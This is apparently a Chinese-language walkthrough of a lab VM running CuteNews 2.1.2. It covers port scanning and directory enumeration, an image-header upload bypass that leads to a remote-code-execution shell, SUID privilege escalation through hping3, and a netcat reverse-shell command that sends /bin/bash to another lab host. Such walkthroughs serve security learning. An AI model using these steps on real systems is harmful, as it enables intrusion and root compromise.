主机探活
nmap -sP 192.168.159.1/24
目标靶机IP为:192.168.159.178
端口扫描
nmap -sV -p- -A 192.168.159.178
目标主机开放端口为:22、80、88、110、995端口
80端口
目录扫描
dirsearch -u http://192.168.159.178
找到一些路径,在README.md
中发现是一个CMS,且知道版本号
本地漏洞库查询后发现存在文件上传漏洞
根据脚本提示操作
cms之文件上传
http://192.168.159.178/index.php
首先注册用户
但是在注册时验证码在页面上是看不见的。。。
于是我翻了网页源码,找到了它生成验证码的地方
访问后会获得一个验证码,填入即可成功注册用户
然后根据脚本内容,访问相应网址
http://www.target.com/cutenews/index.php?mod=main&opt=personal
将我们的反弹shell脚本后缀名改为 jpg,上传,抓包,修改相应内容(就是按照脚本信息做)
但是报错了。。。
2.1.2版本
然后我只能换想法,到处点,然后猛然发现,README骗我。。。这tm版本是2.1.2.。。
重新在漏洞库一搜,发现远程代码执行
修改这个脚本,把对应的路径改了,所有路径的CuteNews都得删掉
直接执行脚本
成功获得shell
这个脚本其实也是通过文件上传做的,但是它的绕过方式是图片马,这台靶机的图片上传验证只验证文件的文件头,不验证后缀,所以在php文件的开头加上图片的特征就能绕过了(或者在图片末尾加php代码,再把后缀改回php)
提权
setuid
find / -perm -u=s -type f 2>/dev/null
直接发现存在 hping3,去网站查找,找到相关提权命令
/usr/sbin/hping3
/bin/sh -p
但是运行的时候发现不太对,估计是shell问题,切换shell
nc 192.168.159.131 7777 -e /bin/bash
重新提权,这个shell也不行,换成python
的
python -c 'import pty;pty.spawn("/bin/bash")'
成功获取 root 权限